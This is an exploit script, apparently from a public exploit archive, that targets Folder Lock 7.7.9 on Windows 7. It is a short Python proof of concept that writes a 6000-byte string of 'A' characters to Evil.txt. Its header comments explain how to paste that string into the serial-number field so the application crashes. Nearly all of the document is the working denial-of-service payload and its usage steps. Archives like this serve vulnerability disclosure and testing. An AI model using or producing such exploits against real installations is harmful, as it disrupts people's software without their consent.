28 lines
No EOL
809 B
Python
Executable file
28 lines
No EOL
809 B
Python
Executable file
# Exploit Title: Folder Lock v7.7.9 Denial of Service Exploit
|
|
# Date: 12.09.2019
|
|
# Vendor Homepage:https://www.newsoftwares.net/folderlock/
|
|
# Software Link: https://www.newsoftwares.net/download/folderlock7-en/folder-lock-en.exe
|
|
# Exploit Author: Achilles
|
|
# Tested Version: 7.7.9
|
|
# Tested on: Windows 7 x64
|
|
|
|
|
|
# 1.- Run python code :Folder_Lock.py
|
|
# 2.- Open EVIL.txt and copy content to clipboard
|
|
# 3.- Open Folderlock and Click 'Enter Key'
|
|
# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key'
|
|
# 5.- Click 'Submit' and you will see a crash.
|
|
|
|
|
|
|
|
#!/usr/bin/env python
|
|
buffer = "\x41" * 6000
|
|
|
|
try:
|
|
f=open("Evil.txt","w")
|
|
print "[+] Creating %s bytes evil payload.." %len(buffer)
|
|
f.write(buffer)
|
|
f.close()
|
|
print "[+] File created!"
|
|
except:
|
|
print "File cannot be created" |